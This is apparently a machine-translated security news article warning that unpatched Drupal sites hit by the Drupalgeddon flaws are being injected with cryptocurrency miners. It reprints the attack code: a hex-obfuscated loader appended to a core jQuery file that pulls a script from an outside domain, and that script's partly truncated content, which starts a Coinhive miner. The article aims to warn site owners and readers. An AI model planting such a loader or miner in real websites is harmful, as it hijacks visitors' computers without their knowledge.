Drupalgeddon effects: Non-updated websites are minning the cryptocurrency

Have you noticed in the last month that your Drupal-powered websites download more server resources than usual? Have you implemented the latest security patches identified by the Drupal Security Team as critical? One with the other is directly related, so there is nothing to wait for - after the published proof of concept attack on non-updated Drupal websites, their hacking / acquisition is as simple as ever. If this play succeeds the attacker, he will be able to put a JavaScript file that refers to the cryptocurrency excavator. As a result, the company loses its image in the eyes of customers and the attacker will be able to extract virtual currency on the website's readers' computers.


Drupalgeddon1, Drupalgeddon2 i Drupalgeddon3

Behind the Drupalgeddon's drupal apocalypse lies the seriousness of the threat that describes the trivial code execution on the server or the takeover of the website. These are high-risk incidents because the attack can be performed on many instances of Drupal.

The first Drupalgeddon (CVE-2014-3704 gap) occurred in 2014 and according to the risk calculator used by the Drupal Security Team, it received a maximum score of 25/25 points on the scale of the seriousness of the threat. Then the problem concerned sending an anonymous user (without special rights) a crafted request causing execution of any SQL code. Depending on the command, this could have resulted in eg escalation of permissions or execution of PHP code.

We were waiting for the second Drupalgeddon for 4 years until 28 March 2018. The quick-release update corrected the CVE-2018-7600 vulnerability, which allowed the attacker to run arbitrary code on the server without special permissions - the attacker in the default installation did not need to authenticate. The vulnerability was determined by Drupal's team to be highly critical with a scale of 24/25 points. It's worth adding that the pages hidden behind the CloudFlare DNS were secure.

The third Drupalgeddon came on April 25, 2018. CVE-2018-7602 susceptibility was already much more difficult to use because it required authentication. This did not prevent the attackers who use the published example exploit (also available in the Exploit Database) to make attacks - as it is called - in the wild.
The mentioned page with the exploit database contains ready sets of commands for remote execution of the code on non-updated pages powered by Drupal. The attack is very easy to carry out. Details are available on GitHub.

There is nothing to wait for. The update is absolutely necessary.

Drupalgeddon's victims in Poland and in the world

Troy Mursch published statistics that he managed to collect so far. Among the compromised 384 pages, most are in the US, France and Canada. On this list, we can see two TLD .PL domains belonging to Polish companies (szybka.pl and vaks.pl), with whom we have contacted and warned the owners. Although the file only points to two companies from Poland, it does not mean that the researcher has managed to reach all websites in the world powered by Drupal. It is difficult to estimate the scale, but there is certainly more to the infected Polish.

The attached code to the page can be recognized by the file "/misc/jquery.once.js?v=1.2", which at the end contains an encrypted script reference on the page hxxp: //vuuwd.com/t.js <- this is not anymore is encrypted:

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

Content of hxxp://vuuwd.com/t.js:

function loadScript(url, callback) {
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.id = "m_g_a_j_s_";
    if (script.readyState) {
        script.onreadystatechange = function () {
            if (script.readyState == "loaded" || script.readyState == "complete") {
                script.onreadystatechange = null;
    } else { // others
        script.onload = function () {
    script.src = url;
loadScript("https://coinhive.com/lib/coinhive.min.js", function () {
        var miner = new CoinHive.Anonymous('KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6', {throttle: 0.2});
        var s = document.getElementById('m_g_a');
        var p = s.parentElement;
        var s1 = document.getElementById('m_g_a_j_s_');
        var p1 = s1.parentElement;

Among the victims there are American and Turkish government websites, universities, the Lenovo website, two pages with a .pl tip and many more.

Niezaktualizowane strony tak kończą.

Non-updated websites are dangerous for Internet users

It is not possible to manually verify the security of every website you visit on the web. To readers, we recommend installing the uBlock Origin ad blocker, which contains built-in black lists of cryptocurrency excavators. This should be enough to block scripts that use processor power. For people who do not want or do not use the uBlock Origin advertising blocker, we recommend the NoCoin plugin for Firefox, Opera and Chrome.

Internet users who already have anti-viruses installed, but not necessarily with browser-based protection, should install the Bitdefender TrafficLight or Avira Browser Safe web scanner.

Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.